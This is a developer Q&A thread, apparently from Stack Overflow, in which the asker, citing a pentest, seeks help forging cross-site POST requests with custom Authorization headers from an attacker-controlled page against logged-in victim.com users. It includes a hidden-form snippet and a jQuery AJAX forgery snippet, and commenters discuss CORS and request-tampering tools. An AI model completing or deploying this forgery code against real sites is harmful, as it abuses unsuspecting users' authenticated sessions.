# Pentesting - Send POST request with modified headers

Tags: javascript, jquery, ajax, post

let me explain you my situation for a pentesting I am doing:

There exist an app on **www.victim.com** that accept POST request with customized headers (e.g: *"Authorization"* : *"xxxxx"*). I have a domain **www.attacker.com** that when visited (by the "victim") needs to execute a code that forge the aforementioned POST request, send it to www.victim.com and reload the webpage. As you can see, the behavior is what is expected from a classic "form":

**Code on attacker site (www.attacker.com):**

```
<form action="www.victim.com" method="POST" id="myForm">
  ... some hidden input ...
  <input type="submit" name="HackIt" value="Hack me!" />            
</form>
```

The main **disadvantage** of the previous method is that I can not customize the header of the request before the form is submitted. That's why I tried to use AJAX and JQuery to modify header before the form is submitted:

```
<script>
    $(document).ready(function(){
        $("#myForm").submit(function(event){
            event.preventDefault(); //prevent default action 
            var post_url = $(this).attr("action"); 
            var request_method = $(this).attr("method");
            var form_data = $(this).serialize();

            $.ajax({
                url : post_url,
                headers: {
                       "Authorization": "xxxxxx",
                       "Accept-Language":"x_machine"
                },
                type: request_method,
                data : form_data
            });
        });
    });
  </script>
```

This code **almost** works! However the response is interpreted by www.attacker.com and not by www.victim.com as expected. Classic form previously mentioned reloads the webpage and allows the response to be interpreted by www.victim.com.

Finally, the question is: What is the "magic recipe" to modify the headers of the request and submit it as the classic form to allow the response be interpreted by www.victim.com?

Thanks in advance!

Comment: Ajax requests from attacker to victim would be met with CORS restrictions, unless the victim was poorly configured or expressly allowed requests from the attacker domain.  Also the vibe of this question is really weird with the sorta "help me hack this site" vibe.

Comment: @Taplar Actually, the victim'site allows requests from any domain. It is related to a professional pentesting I'm doing that require some coding... I don't see why you see this as weird.

Comment: There are actually browser plugins that you can use the intercept any request from the client to the server, including form submits, which would allow you to alter the headers.  This would seem to directly relate to your fore mentioned *main disadvantages* of the form route.  Firefox( https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ ), Chrome ( https://chrome.google.com/webstore/detail/tamper-chrome-extension/hifhgpdkfodlpnlmlnmhchnkepplebkb ).  I think the one I'm familiar with people using is the Tamper Data one.

Comment: Actually, the scenario is that the victim opens **www.attacker.com** webpage, so all modifications should be on victim's side. This scenario does not allow to use proxy on victim's side (e.g: Tamper Data).

Comment: Ok, I'm confused.  When you say victim, are you talking about a user opening attacker.com, or are you talking about victim.com accessing a page on attacker.com through a form submit or ajax request?  And as far as I am aware, Tamper Data doesn't use a proxy.  It uses the browser to act as an easy way to perform a MITM attack, but there isn't a proxy.  You're just using the browser to alter the request before it continues on.

Comment: I mean a user authenticated en www.victim.com thar visits a webpage created by me (www.attacker.com). I hope the scenario is now clearer.

Comment: most of your tempred data will be met with the CORS protection wich is a standard in most of the webserver now days

Comment: @Abdeslen Charif In this scenario, the victim's site allows requests from any domain.